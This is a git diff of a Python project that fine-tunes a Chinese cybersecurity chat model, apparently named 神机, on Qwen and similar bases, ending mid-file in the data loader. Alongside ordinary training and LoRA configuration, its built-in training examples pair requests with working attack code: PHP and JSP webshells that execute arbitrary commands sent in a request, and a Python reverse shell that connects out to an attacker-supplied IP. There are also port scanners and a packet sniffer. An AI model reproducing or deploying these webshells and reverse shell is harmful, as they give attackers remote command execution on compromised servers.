+from .training_config import TrainingConfig
+from .data_config import DataConfig
+
+__all__ = ['Config', 'TrainingConfig', 'DataConfig']

BIN
src/config/__pycache__/__init__.cpython-310.pyc


BIN
src/config/__pycache__/data_config.cpython-310.pyc


BIN
src/config/__pycache__/model_configs.cpython-310.pyc


BIN
src/config/__pycache__/settings.cpython-310.pyc


BIN
src/config/__pycache__/training_config.cpython-310.pyc


+ 180 - 0
src/config/data_config.py

@@ -0,0 +1,180 @@
+# -*- coding: utf-8 -*-
+"""
+数据配置模块
+
+定义数据源、处理参数等配置。
+"""
+
+from dataclasses import dataclass
+from typing import Dict, List, Any
+
+
+@dataclass
+class DataConfig:
+    """数据配置类"""
+    
+    # 数据处理参数
+    max_samples_per_dataset: int = 50000
+    min_instruction_length: int = 5
+    min_output_length: int = 10
+    max_sequence_length: int = 256  # 最大序列长度,减小以节省显存
+    
+    # 数据源配置
+    data_sources: Dict[str, List[str]] = None
+    
+    def __post_init__(self):
+        if self.data_sources is None:
+            self.data_sources = {
+                "cybersecurity": [
+                    "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt",
+                    "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/README.md"
+                ],
+                "code_datasets": [
+                    "codeparrot/github-code-clean",
+                    "bigcode/the-stack-dedup"
+                ],
+                "chinese_datasets": [
+                    "BAAI/COIG-PC",
+                    "shibing624/medical"
+                ],
+                "security_datasets": [
+                    "cybersecurity-qa",
+                    "penetration-testing-data"
+                ]
+            }
+
+
+@dataclass
+class PromptTemplate:
+    """提示模板类"""
+    
+    system: str
+    instruction: str
+    response: str = ""
+    
+    def format_conversation(self, instruction: str, input_text: str = "", output: str = "") -> str:
+        """格式化对话"""
+        if input_text:
+            user_content = f"{instruction}\n{input_text}"
+        else:
+            user_content = instruction
+        
+        conversation = (
+            f"<|im_start|>system\n{self.system}<|im_end|>\n"
+            f"<|im_start|>user\n{user_content}<|im_end|>\n"
+            f"<|im_start|>assistant\n{output}<|im_end|>"
+        )
+        
+        return conversation
+
+
+class PromptTemplates:
+    """提示模板集合"""
+    
+    CYBERSECURITY = PromptTemplate(
+        system="你是神机,由云霖网络安全实验室训练的网络安全大模型。你具备深厚的网络安全专业知识和实战经验,能够提供各种网络安全相关的技术指导,包括但不限于渗透测试、代码审计、漏洞分析等。",
+        instruction="请根据以下网络安全问题提供详细的技术分析和解决方案:",
+        response="根据你的问题,我来提供专业的网络安全分析:"
+    )
+    
+    CODE = PromptTemplate(
+        system="你是神机,由云霖网络安全实验室训练的网络安全大模型。你是一个编程专家,能够编写和分析各种编程语言的代码,特别擅长安全相关的代码开发。",
+        instruction="请根据以下编程需求提供完整的代码实现:",
+        response="以下是针对你需求的代码实现:"
+    )
+    
+    GENERAL = PromptTemplate(
+        system="你是神机,由云霖网络安全实验室训练的网络安全大模型。你具备编程和网络安全专业知识,能够为用户提供专业的技术支持和解决方案。",
+        instruction="请回答以下问题:",
+        response=""
+    )
+    
+    @classmethod
+    def get_template(cls, category: str) -> PromptTemplate:
+        """根据类别获取模板"""
+        template_map = {
+            "cybersecurity": cls.CYBERSECURITY,
+            "security": cls.CYBERSECURITY,
+            "webshell": cls.CYBERSECURITY,
+            "code": cls.CODE,
+            "general": cls.GENERAL,
+        }
+        
+        return template_map.get(category, cls.GENERAL)
+
+
+class SecurityExamples:
+    """安全示例数据"""
+    
+    WEBSHELL_EXAMPLES = [
+        {
+            "instruction": "生成一个PHP webshell",
+            "output": '''<?php
+if(isset($_POST['cmd'])){
+    $cmd = $_POST['cmd'];
+    echo "<pre>";
+    echo shell_exec($cmd);
+    echo "</pre>";
+}
+?>
+<form method="POST">
+    <input type="text" name="cmd" placeholder="输入命令">
+    <input type="submit" value="执行">
+</form>''',
+            "category": "webshell"
+        },
+        {
+            "instruction": "创建一个简单的JSP webshell",
+            "output": '''<%@ page import="java.io.*" %>
+<%
+String cmd = request.getParameter("cmd");
+if(cmd != null) {
+    Process p = Runtime.getRuntime().exec(cmd);
+    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
+    String line;
+    while((line = br.readLine()) != null) {
+        out.println(line + "<br>");
+    }
+}
+%>
+<form>
+    <input type="text" name="cmd">
+    <input type="submit" value="执行">
+</form>''',
+            "category": "webshell"
+        }
+    ]
+    
+    SECURITY_EXAMPLES = [
+        {
+            "instruction": "解释SQL注入攻击的原理和防护方法",
+            "output": "SQL注入是一种代码注入技术,攻击者通过在应用程序的输入字段中插入恶意SQL代码来操纵数据库查询。防护方法包括:1.使用参数化查询 2.输入验证和过滤 3.最小权限原则 4.WAF防护等。",
+            "category": "security"
+        },
+        {
+            "instruction": "编写一个端口扫描脚本",
+            "output": '''import socket
+from threading import Thread
+
+def scan_port(host, port):
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.settimeout(1)
+        result = sock.connect_ex((host, port))
+        if result == 0:
+            print(f"端口 {port} 开放")
+        sock.close()
+    except:
+        pass
+
+host = "127.0.0.1"
+for port in range(1, 1000):
+    Thread(target=scan_port, args=(host, port)).start()''',
+            "category": "code"
+        }
+    ]
+    
+    @classmethod
+    def get_all_examples(cls) -> List[Dict[str, Any]]:
+        """获取所有示例数据"""
+        return cls.WEBSHELL_EXAMPLES + cls.SECURITY_EXAMPLES

+ 177 - 0
src/config/model_configs.py

@@ -0,0 +1,177 @@
+# -*- coding: utf-8 -*-
+"""
+多模型配置模块
+
+定义支持的多个模型配置和适配器。
+"""
+
+from typing import Dict, Any, Optional
+from dataclasses import dataclass
+from pathlib import Path
+
+
+@dataclass
+class ModelConfig:
+    """单个模型配置"""
+    name: str  # 模型显示名称
+    model_id: str  # HuggingFace/ModelScope模型ID
+    modelscope_id: Optional[str] = None  # ModelScope专用ID(如果不同)
+    local_dir_name: str = None  # 本地目录名
+    architecture: str = "auto"  # 模型架构
+    max_length: int = 2048  # 最大序列长度
+    supports_chat_template: bool = True  # 是否支持chat template
+    quantization_compatible: bool = True  # 是否支持量化
+    lora_compatible: bool = True  # 是否支持LoRA
+    lora_target_modules: Optional[list] = None  # LoRA目标模块
+    special_tokens: Dict[str, str] = None  # 特殊token配置
+    generation_config: Dict[str, Any] = None  # 生成配置
+    identity_prompt: str = None  # 默认身份提示词
+    
+    def __post_init__(self):
+        if self.local_dir_name is None:
+            self.local_dir_name = self.model_id.replace("/", "_")
+        
+        if self.special_tokens is None:
+            self.special_tokens = {}
+        
+        if self.generation_config is None:
+            self.generation_config = {
+                "temperature": 0.7,
+                "top_p": 0.8,
+                "top_k": 20,
+                "repetition_penalty": 1.1,
+                "do_sample": True
+            }
+        
+        if self.identity_prompt is None:
+            self.identity_prompt = "你是神机,由云霖网络安全实验室训练的网络安全大模型。你具备深厚的网络安全专业知识和实战经验,能够提供专业的网络安全技术指导和解决方案。"
+
+
+class ModelRegistry:
+    """模型注册表"""
+    
+    # 支持的模型配置
+    SUPPORTED_MODELS = {
+        "qwen2.5-1.5b-instruct": ModelConfig(
+            name="Qwen2.5-1.5B-Instruct",
+            model_id="Qwen/Qwen2.5-1.5B-Instruct",
+            modelscope_id="qwen/Qwen2.5-1.5B-Instruct",
+            local_dir_name="Qwen_Qwen2.5-1.5B-Instruct",
+            architecture="qwen2",
+            max_length=32768,
+            supports_chat_template=True,
+            quantization_compatible=True,
+            lora_compatible=True,
+            special_tokens={
+                "bos_token": "<|endoftext|>",
+                "eos_token": "<|im_end|>",
+                "pad_token": "<|endoftext|>",
+                "unk_token": "<|endoftext|>"
+            },
+            generation_config={
+                "temperature": 0.7,
+                "top_p": 0.8,
+                "top_k": 20,
+                "repetition_penalty": 1.1,
+                "do_sample": True,
+                "max_new_tokens": 512
+            }
+        ),
+        
+        "qwen2-1.5b-instruct": ModelConfig(
+            name="Qwen2-1.5B-Instruct",
+            model_id="Qwen/Qwen2-1.5B-Instruct",
+            modelscope_id="qwen/Qwen2-1.5B-Instruct",
+            local_dir_name="Qwen_Qwen2-1.5B-Instruct",
+            architecture="qwen2",
+            max_length=32768,
+            supports_chat_template=True,
+            quantization_compatible=True,
+            lora_compatible=True
+        ),
+        
+        "qwen2-7b-instruct": ModelConfig(
+            name="Qwen2-7B-Instruct",
+            model_id="Qwen/Qwen2-7B-Instruct",
+            modelscope_id="qwen/Qwen2-7B-Instruct",
+            local_dir_name="Qwen_Qwen2-7B-Instruct",
+            architecture="qwen2",
+            max_length=32768,
+            supports_chat_template=True,
+            quantization_compatible=True,
+            lora_compatible=True
+        ),
+        
+        "chatglm3-6b": ModelConfig(
+            name="ChatGLM3-6B",
+            model_id="THUDM/chatglm3-6b",
+            modelscope_id="ZhipuAI/chatglm3-6b",
+            local_dir_name="THUDM_chatglm3-6b",
+            architecture="chatglm",
+            max_length=8192,
+            supports_chat_template=False,  # 使用自定义对话格式
+            quantization_compatible=True,
+            lora_compatible=True,
+            identity_prompt="你是神机,一个由云霖网络安全实验室开发的网络安全助手。"
+        ),
+        
+        "baichuan2-7b-chat": ModelConfig(
+            name="Baichuan2-7B-Chat",
+            model_id="baichuan-inc/Baichuan2-7B-Chat",
+            modelscope_id="baichuan-inc/Baichuan2-7B-Chat",
+            local_dir_name="baichuan-inc_Baichuan2-7B-Chat",
+            architecture="baichuan",
+            max_length=4096,
+            supports_chat_template=False,
+            quantization_compatible=True,
+            lora_compatible=True
+        ),
+        
+        "llama2-7b-chat": ModelConfig(
+            name="Llama2-7B-Chat",
+            model_id="meta-llama/Llama-2-7b-chat-hf",
+            modelscope_id="modelscope/Llama-2-7b-chat-ms",
+            local_dir_name="meta-llama_Llama-2-7b-chat-hf",
+            architecture="llama",
+            max_length=4096,
+            supports_chat_template=True,
+            quantization_compatible=True,
+            lora_compatible=True
+        )
+    }
+    
+    @classmethod
+    def get_model_config(cls, model_key: str) -> ModelConfig:
+        """获取模型配置"""
+        if model_key not in cls.SUPPORTED_MODELS:
+            raise ValueError(f"不支持的模型: {model_key}。支持的模型: {list(cls.SUPPORTED_MODELS.keys())}")
+        return cls.SUPPORTED_MODELS[model_key]
+    
+    @classmethod
+    def list_models(cls) -> Dict[str, str]:
+        """列出所有支持的模型"""
+        return {key: config.name for key, config in cls.SUPPORTED_MODELS.items()}
+    
+    @classmethod
+    def get_default_model(cls) -> str:
+        """获取默认模型"""
+        return "qwen2.5-1.5b-instruct"
+    
+    @classmethod
+    def add_custom_model(cls, key: str, config: ModelConfig) -> None:
+        """添加自定义模型配置"""
+        cls.SUPPORTED_MODELS[key] = config
+    
+    @classmethod
+    def get_model_path(cls, model_key: str, base_dir: Path) -> Path:
+        """获取模型本地路径"""
+        config = cls.get_model_config(model_key)
+        return base_dir / config.local_dir_name
+    
+    @classmethod
+    def get_model_id_for_download(cls, model_key: str, use_modelscope: bool = True) -> str:
+        """获取用于下载的模型ID"""
+        config = cls.get_model_config(model_key)
+        if use_modelscope and config.modelscope_id:
+            return config.modelscope_id
+        return config.model_id

+ 109 - 0
src/config/settings.py

@@ -0,0 +1,109 @@
+# -*- coding: utf-8 -*-
+"""
+主配置文件
+
+定义系统的核心配置参数。
+"""
+
+import os
+from pathlib import Path
+from typing import Dict, List, Any, Optional
+from .model_configs import ModelRegistry
+
+
+class Config:
+    """系统主配置类"""
+    
+    # 项目根目录
+    PROJECT_ROOT = Path(__file__).parent.parent.parent
+    
+    # 基础路径配置
+    DATA_DIR = PROJECT_ROOT / "data"
+    MODELS_DIR = PROJECT_ROOT / "models"
+    LOGS_DIR = PROJECT_ROOT / "logs"
+    CACHE_DIR = PROJECT_ROOT / "cache"
+    CHECKPOINTS_DIR = PROJECT_ROOT / "checkpoints"
+    OUTPUT_DIR = PROJECT_ROOT / "output"
+    
+    # 模型配置
+    DEFAULT_MODEL_KEY = "qwen2.5-1.5b-instruct"  # 默认模型
+    CURRENT_MODEL_KEY = None  # 当前选择的模型,None表示使用默认
+    MODEL_SAVE_PATH = OUTPUT_DIR / "trained_model"
+    
+    @classmethod
+    def get_current_model_key(cls) -> str:
+        """获取当前模型键"""
+        return cls.CURRENT_MODEL_KEY or cls.DEFAULT_MODEL_KEY
+    
+    @classmethod
+    def set_current_model(cls, model_key: str) -> None:
+        """设置当前模型"""
+        # 验证模型是否支持
+        ModelRegistry.get_model_config(model_key)
+        cls.CURRENT_MODEL_KEY = model_key
+    
+    @classmethod
+    def get_current_model_config(cls):
+        """获取当前模型配置"""
+        return ModelRegistry.get_model_config(cls.get_current_model_key())
+    
+    @classmethod
+    def get_model_path(cls, model_key: Optional[str] = None) -> Path:
+        """获取模型本地路径"""
+        if model_key is None:
+            model_key = cls.get_current_model_key()
+        return ModelRegistry.get_model_path(model_key, cls.MODELS_DIR)
+    
+    @classmethod
+    def get_model_id_for_download(cls, platform: str = 'modelscope', model_key: Optional[str] = None) -> str:
+        """获取用于下载的模型ID"""
+        if model_key is None:
+            model_key = cls.get_current_model_key()
+        use_modelscope = platform == 'modelscope' if platform else cls.USE_MODELSCOPE
+        return ModelRegistry.get_model_id_for_download(model_key, use_modelscope)
+    
+    # 兼容性:保持旧的BASE_MODEL_NAME属性
+    @property
+    def BASE_MODEL_NAME(cls) -> str:
+        """兼容性属性:获取当前模型的下载ID"""
+        return cls.get_model_id_for_download()
+    
+    # 系统配置
+    USE_MODELSCOPE = True  # 使用国内源
+    DEVICE = "cuda" if os.path.exists("/dev/nvidia0") else "cpu"
+    
+    # 环境变量
+    HF_HOME = str(CACHE_DIR / "huggingface")
+    TRANSFORMERS_CACHE = str(CACHE_DIR / "transformers")
+    
+    @classmethod
+    def create_directories(cls) -> None:
+        """创建必要的目录"""
+        directories = [
+            cls.DATA_DIR,
+            cls.MODELS_DIR,
+            cls.LOGS_DIR,
+            cls.CACHE_DIR,
+            cls.CHECKPOINTS_DIR,
+            cls.OUTPUT_DIR,
+        ]
+        
+        for directory in directories:
+            directory.mkdir(parents=True, exist_ok=True)
+    
+    @classmethod
+    def setup_environment(cls) -> None:
+        """设置环境变量"""
+        os.environ["HF_HOME"] = cls.HF_HOME
+        os.environ["TRANSFORMERS_CACHE"] = cls.TRANSFORMERS_CACHE
+        os.environ["TOKENIZERS_PARALLELISM"] = "false"
+        
+        if cls.DEVICE == "cuda":
+            os.environ["CUDA_VISIBLE_DEVICES"] = "0"
+    
+    @classmethod
+    def get_log_file(cls, name: str) -> Path:
+        """获取日志文件路径"""
+        from datetime import datetime
+        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
+        return cls.LOGS_DIR / f"{name}_{timestamp}.log"

+ 115 - 0
src/config/training_config.py

@@ -0,0 +1,115 @@
+# -*- coding: utf-8 -*-
+"""
+训练配置模块
+
+定义模型训练相关的所有参数。
+"""
+
+from dataclasses import dataclass
+from typing import List, Optional
+
+
+@dataclass
+class TrainingConfig:
+    """训练配置类"""
+    
+    # 基础训练参数
+    batch_size: int = 1  # 适配6GB显存
+    gradient_accumulation_steps: int = 16  # 通过梯度累积增加有效batch size
+    learning_rate: float = 2e-4
+    num_epochs: int = 3
+    max_length: int = 256  # 减小序列长度节省显存
+    warmup_steps: int = 100
+    save_steps: int = 500
+    logging_steps: int = 50
+    eval_steps: int = 500
+    
+    # LoRA配置
+    use_lora: bool = True  # 是否使用LoRA微调
+    lora_config: Optional['LoRAConfig'] = None
+    
+    # 优化器配置
+    optim: str = "adamw_torch"
+    lr_scheduler_type: str = "cosine"
+    weight_decay: float = 0.01
+    
+    # 精度和性能配置
+    fp16: bool = True  # 使用半精度节省显存
+    gradient_checkpointing: bool = False  # 暂时禁用梯度检查点避免冲突
+    dataloader_num_workers: int = 0  # 减少worker数量节省内存
+    remove_unused_columns: bool = False
+    
+    # 模型保存配置
+    save_total_limit: int = 3
+    load_best_model_at_end: bool = True
+    metric_for_best_model: str = "eval_loss"
+    greater_is_better: bool = False
+    
+    # 数据分割
+    train_test_split: float = 0.95
+    
+    # 随机种子
+    seed: int = 42
+    
+    def __post_init__(self):
+        if self.lora_config is None:
+            self.lora_config = LoRAConfig()
+    
+    def to_training_arguments_dict(self) -> dict:
+        """转换为TrainingArguments所需的字典格式"""
+        return {
+            "per_device_train_batch_size": self.batch_size,
+            "per_device_eval_batch_size": self.batch_size,
+            "gradient_accumulation_steps": self.gradient_accumulation_steps,
+            "learning_rate": self.learning_rate,
+            "num_train_epochs": self.num_epochs,
+            "warmup_steps": self.warmup_steps,
+            "logging_steps": self.logging_steps,
+            "save_steps": self.save_steps,
+            "eval_steps": self.eval_steps,
+            "eval_strategy": "steps",
+            "save_strategy": "steps",
+            "load_best_model_at_end": self.load_best_model_at_end,
+            "metric_for_best_model": self.metric_for_best_model,
+            "greater_is_better": self.greater_is_better,
+            "fp16": self.fp16,
+            "gradient_checkpointing": self.gradient_checkpointing,
+            "dataloader_num_workers": self.dataloader_num_workers,
+            "remove_unused_columns": self.remove_unused_columns,
+            "report_to": None,
+            "save_total_limit": self.save_total_limit,
+            "prediction_loss_only": True,
+            "optim": self.optim,
+            "lr_scheduler_type": self.lr_scheduler_type,
+            "weight_decay": self.weight_decay,
+            "seed": self.seed,
+            "overwrite_output_dir": True,
+        }
+
+
+@dataclass
+class LoRAConfig:
+    """LoRA配置类"""
+    
+    r: int = 16  # LoRA秩
+    lora_alpha: int = 32  # LoRA alpha参数
+    lora_dropout: float = 0.1  # LoRA dropout
+    bias: str = "none"  # bias类型
+    target_modules: List[str] = None  # 目标模块
+    
+    def __post_init__(self):
+        if self.target_modules is None:
+            self.target_modules = [
+                "q_proj", "v_proj", "k_proj", "o_proj",
+                "gate_proj", "up_proj", "down_proj"
+            ]
+    
+    def to_peft_config_dict(self) -> dict:
+        """转换为PEFT配置字典"""
+        return {
+            "r": self.r,
+            "lora_alpha": self.lora_alpha,
+            "lora_dropout": self.lora_dropout,
+            "bias": self.bias,
+            "target_modules": self.target_modules,
+        }

+ 12 - 0
src/data/__init__.py

@@ -0,0 +1,12 @@
+# -*- coding: utf-8 -*-
+"""
+数据处理模块
+
+负责数据的下载、清洗、处理和加载。
+"""
+
+from .downloader import DataDownloader
+from .processor import DataProcessor
+from .loader import DataLoader
+
+__all__ = ['DataDownloader', 'DataProcessor', 'DataLoader']

BIN
src/data/__pycache__/__init__.cpython-310.pyc


BIN
src/data/__pycache__/downloader.cpython-310.pyc


BIN
src/data/__pycache__/loader.cpython-310.pyc


BIN
src/data/__pycache__/processor.cpython-310.pyc


+ 304 - 0
src/data/downloader.py

@@ -0,0 +1,304 @@
+# -*- coding: utf-8 -*-
+"""
+数据下载器模块
+
+负责从各种数据源下载训练数据。
+"""
+
+import requests
+import logging
+from typing import List, Dict, Any
+from pathlib import Path
+
+from ..config import Config, DataConfig
+from ..config.data_config import SecurityExamples
+from ..utils.logger import get_logger
+
+
+class DataDownloader:
+    """数据下载器"""
+    
+    def __init__(self, config: Config = None, data_config: DataConfig = None):
+        self.config = config or Config()
+        self.data_config = data_config or DataConfig()
+        self.logger = get_logger(self.__class__.__name__)
+        
+        # 确保数据目录存在
+        self.config.DATA_DIR.mkdir(parents=True, exist_ok=True)
+    
+    def download_security_data(self) -> List[Dict[str, Any]]:
+        """下载网络安全相关数据"""
+        self.logger.info("正在下载网络安全数据...")
+        
+        # 获取内置的安全示例数据
+        security_data = SecurityExamples.get_all_examples()
+        
+        # 生成更多安全相关的训练数据
+        additional_examples = self._generate_security_examples()
+        security_data.extend(additional_examples)
+        
+        self.logger.info(f"获取到 {len(security_data)} 条安全数据")
+        return security_data
+    
+    def download_code_data(self) -> List[Dict[str, Any]]:
+        """下载编程相关数据"""
+        self.logger.info("正在下载编程数据...")
+        
+        code_data = []
+        
+        # 生成编程示例
+        code_examples = self._generate_code_examples()
+        code_data.extend(code_examples)
+        
+        self.logger.info(f"获取到 {len(code_data)} 条编程数据")
+        return code_data
+    
+    def download_chinese_data(self) -> List[Dict[str, Any]]:
+        """下载中文数据"""
+        self.logger.info("正在下载中文数据...")
+        
+        chinese_data = []
+        
+        # 生成中文安全相关的对话数据
+        chinese_examples = self._generate_chinese_examples()
+        chinese_data.extend(chinese_examples)
+        
+        self.logger.info(f"获取到 {len(chinese_data)} 条中文数据")
+        return chinese_data
+    
+    def download_all_data(self) -> List[Dict[str, Any]]:
+        """下载所有数据"""
+        self.logger.info("开始下载所有训练数据...")
+        
+        all_data = []
+        
+        # 下载各类数据
+        try:
+            security_data = self.download_security_data()
+            all_data.extend(security_data)
+        except Exception as e:
+            self.logger.error(f"下载安全数据失败: {e}")
+        
+        try:
+            code_data = self.download_code_data()
+            all_data.extend(code_data)
+        except Exception as e:
+            self.logger.error(f"下载编程数据失败: {e}")
+        
+        try:
+            chinese_data = self.download_chinese_data()
+            all_data.extend(chinese_data)
+        except Exception as e:
+            self.logger.error(f"下载中文数据失败: {e}")
+        
+        self.logger.info(f"数据下载完成!总共获得 {len(all_data)} 条数据")
+        return all_data
+    
+    def _generate_security_examples(self) -> List[Dict[str, Any]]:
+        """生成安全示例数据"""
+        examples = [
+            {
+                "instruction": "生成一个反弹shell的Python脚本",
+                "output": '''import socket
+import subprocess
+import os
+
+def reverse_shell(host, port):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    
+    while True:
+        command = s.recv(1024).decode()
+        if command.lower() == 'exit':
+            break
+        
+        output = subprocess.getoutput(command)
+        s.send(output.encode())
+    
+    s.close()
+
+# 使用方法: reverse_shell("攻击者IP", 端口)''',
+                "input": "",
+                "category": "security"
+            },
+            {
+                "instruction": "解释XSS攻击原理和防护方法",
+                "output": "XSS(跨站脚本攻击)是一种代码注入攻击,攻击者将恶意脚本注入到网页中。防护方法包括:1.输出编码 2.输入验证 3.CSP策略 4.HttpOnly Cookie等。",
+                "input": "",
+                "category": "security"
+            },
+            {
+                "instruction": "编写一个简单的网络扫描器",
+                "output": '''import socket
+import threading
+from datetime import datetime
+
+class NetworkScanner:
+    def __init__(self, target_host):
+        self.target = target_host
+        self.open_ports = []
+    
+    def scan_port(self, port):
+        try:
+            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            sock.settimeout(1)
+            result = sock.connect_ex((self.target, port))
+            if result == 0:
+                self.open_ports.append(port)
+                print(f"端口 {port}: 开放")
+            sock.close()
+        except:
+            pass
+    
+    def scan_range(self, start_port, end_port):
+        print(f"开始扫描 {self.target}...")
+        threads = []
+        
+        for port in range(start_port, end_port + 1):
+            thread = threading.Thread(target=self.scan_port, args=(port,))
+            threads.append(thread)
+            thread.start()
+        
+        for thread in threads:
+            thread.join()
+        
+        print(f"扫描完成,发现 {len(self.open_ports)} 个开放端口")
+        return self.open_ports
+
+# 使用示例
+scanner = NetworkScanner("127.0.0.1")
+open_ports = scanner.scan_range(1, 1000)''',
+                "input": "",
+                "category": "code"
+            }
+        ]
+        
+        return examples
+    
+    def _generate_code_examples(self) -> List[Dict[str, Any]]:
+        """生成编程示例数据"""
+        examples = [
+            {
+                "instruction": "编写一个Python函数来检测文件是否为恶意软件",
+                "output": '''import hashlib
+import requests
+import os
+
+def check_malware(file_path):
+    """检测文件是否为恶意软件"""
+    if not os.path.exists(file_path):
+        return {"error": "文件不存在"}
+    
+    # 计算文件MD5
+    with open(file_path, 'rb') as f:
+        file_hash = hashlib.md5(f.read()).hexdigest()
+    
+    # 检查文件大小
+    file_size = os.path.getsize(file_path)
+    
+    # 简单的启发式检测
+    suspicious_patterns = [b'eval', b'exec', b'system', b'shell_exec']
+    is_suspicious = False
+    
+    try:
+        with open(file_path, 'rb') as f:
+            content = f.read()
+            for pattern in suspicious_patterns:
+                if pattern in content:
+                    is_suspicious = True
+                    break
+    except:
+        pass
+    
+    return {
+        "file_path": file_path,
+        "md5_hash": file_hash,
+        "file_size": file_size,
+        "is_suspicious": is_suspicious,
+        "risk_level": "high" if is_suspicious else "low"
+    }
+
+# 使用示例
+result = check_malware("example.php")
+print(result)''',
+                "input": "",
+                "category": "code"
+            },
+            {
+                "instruction": "创建一个简单的网络数据包捕获程序",
+                "output": '''from scapy.all import *
+import time
+
+class PacketCapture:
+    def __init__(self, interface="eth0"):
+        self.interface = interface
+        self.captured_packets = []
+    
+    def packet_handler(self, packet):
+        """数据包处理函数"""
+        timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
+        
+        if packet.haslayer(IP):
+            ip_src = packet[IP].src
+            ip_dst = packet[IP].dst
+            protocol = packet[IP].proto
+            
+            packet_info = {
+                "timestamp": timestamp,
+                "src_ip": ip_src,
+                "dst_ip": ip_dst,
+                "protocol": protocol
+            }
+            
+            if packet.haslayer(TCP):
+                packet_info["src_port"] = packet[TCP].sport
+                packet_info["dst_port"] = packet[TCP].dport
+                packet_info["protocol_name"] = "TCP"
+            elif packet.haslayer(UDP):
+                packet_info["src_port"] = packet[UDP].sport
+                packet_info["dst_port"] = packet[UDP].dport
+                packet_info["protocol_name"] = "UDP"
+            
+            self.captured_packets.append(packet_info)
+            print(f"[{timestamp}] {ip_src} -> {ip_dst} ({packet_info.get('protocol_name', 'Unknown')})")
+    
+    def start_capture(self, count=10):
+        """开始捕获数据包"""
+        print(f"开始在 {self.interface} 上捕获数据包...")
+        sniff(iface=self.interface, prn=self.packet_handler, count=count)
+        return self.captured_packets
+
+# 使用示例
+capture = PacketCapture()
+packets = capture.start_capture(count=20)''',
+                "input": "",
+                "category": "code"
+            }
+        ]
+        
+        return examples
+    
+    def _generate_chinese_examples(self) -> List[Dict[str, Any]]:
+        """生成中文示例数据"""
+        examples = [
+            {
+                "instruction": "什么是CSRF攻击?如何防护?",
+                "output": "CSRF(跨站请求伪造)利用用户已登录的身份,诱导用户执行非本意的操作。防护措施包括:1.CSRF Token验证 2.验证HTTP Referer头 3.双重Cookie验证 4.设置SameSite Cookie属性 5.重要操作需要二次确认。",
+                "input": "",
+                "category": "chinese_security"
+            },
+            {
+                "instruction": "解释缓冲区溢出攻击的原理",
+                "output": "缓冲区溢出是指程序向缓冲区写入数据时超出了缓冲区的边界,覆盖了相邻的内存区域。攻击者可以利用这个漏洞执行恶意代码。防护方法包括:1.使用安全的函数 2.栈保护机制 3.地址空间随机化(ASLR) 4.数据执行保护(DEP) 5.代码审计和静态分析。",
+                "input": "",
+                "category": "chinese_security"
+            },
+            {
+                "instruction": "如何进行Web应用安全测试?",
+                "output": "Web应用安全测试的主要步骤:1.信息收集(端口扫描、目录枚举、技术栈识别)2.漏洞扫描(SQL注入、XSS、CSRF等)3.身份验证测试(弱密码、会话管理)4.授权测试(权限绕过、越权访问)5.输入验证测试(文件上传、参数污染)6.业务逻辑测试(支付绕过、逻辑缺陷)7.配置安全测试(默认配置、敏感信息泄露)。",
+                "input": "",
+                "category": "chinese_security"
+            }
+        ]
+        
+        return examples

+ 252 - 0
src/data/loader.py

@@ -0,0 +1,252 @@
+# -*- coding: utf-8 -*-
+"""
+数据加载器模块
+
+负责为模型训练准备数据集。
+"""
+
+import json
+from typing import List, Dict, Any, Optional
+from pathlib import Path
+from torch.utils.data import Dataset
+from transformers import PreTrainedTokenizer
+
+from ..config import Config, DataConfig
+from ..utils.logger import get_logger
+
+
+class SecurityDataset(Dataset):
+    """网络安全数据集"""
+    
+    def __init__(self, data: List[Dict[str, str]], tokenizer: PreTrainedTokenizer, 
+                 max_length: int = 512):
+        self.data = data
+        self.tokenizer = tokenizer
+        self.max_length = max_length
+    
+    def __len__(self):
+        return len(self.data)
+    
+    def __getitem__(self, idx):
+        item = self.data[idx]
+        
+        # 处理不同的数据格式
+        if "text" in item:
+            text = item["text"]
+        elif "instruction" in item and "output" in item:
+            # 格式化instruction-output格式的数据
+            instruction = item["instruction"]
+            input_text = item.get("input", "")
+            output = item["output"]
+            
+            if input_text:
+                text = f"<|im_start|>user\n{instruction}\n{input_text}<|im_end|>\n<|im_start|>assistant\n{output}<|im_end|>"
+            else:
+                text = f"<|im_start|>user\n{instruction}<|im_end|>\n<|im_start|>assistant\n{output}<|im_end|>"
+        else:
+            # 如果都没有,尝试将整个item转换为字符串
+            text = str(item)
+        
+        # 分词
+        encoding = self.tokenizer(
+            text,
+            truncation=True,
+            padding="max_length",
+            max_length=self.max_length,
+            return_tensors="pt"
+        )
+        
+        return {
+            "input_ids": encoding["input_ids"].flatten(),
+            "attention_mask": encoding["attention_mask"].flatten(),
+            "labels": encoding["input_ids"].flatten()
+        }
+
+
+class DataLoader:
+    """数据加载器"""
+    
+    def __init__(self, config: Config = None, data_config: DataConfig = None):
+        self.config = config or Config()
+        self.data_config = data_config or DataConfig()
+        self.logger = get_logger(self.__class__.__name__)
+        self.loaded_files = []  # 记录已加载的文件
+    
+    def load_all_json_files_from_directory(self, directory_path: Path) -> List[Dict[str, str]]:
+        """从目录加载所有JSON和JSONL文件"""
+        all_data = []
+        # 同时查找JSON和JSONL文件
+        json_files = list(directory_path.glob("*.json"))
+        jsonl_files = list(directory_path.glob("*.jsonl"))
+        all_files = json_files + jsonl_files
+        self.loaded_files = []  # 重置已加载文件列表
+        
+        if not all_files:
+            self.logger.warning(f"目录 {directory_path} 中未找到JSON或JSONL文件")
+            return all_data
+        
+        self.logger.info(f"发现 {len(json_files)} 个JSON文件和 {len(jsonl_files)} 个JSONL文件")
+        
+        # 处理JSON文件
+        for json_file in json_files:
+            try:
+                self.logger.info(f"正在加载JSON文件: {json_file.name}")
+                with open(json_file, 'r', encoding='utf-8') as f:
+                    file_data = json.load(f)
+                
+                # 确保数据是列表格式
+                if isinstance(file_data, list):
+                    all_data.extend(file_data)
+                    self.logger.info(f"从 {json_file.name} 加载了 {len(file_data)} 条数据")
+                    self.loaded_files.append(f"{json_file.name} ({len(file_data)}条)")
+                elif isinstance(file_data, dict):
+                    all_data.append(file_data)
+                    self.logger.info(f"从 {json_file.name} 加载了 1 条数据")
+                    self.loaded_files.append(f"{json_file.name} (1条)")
+                else:
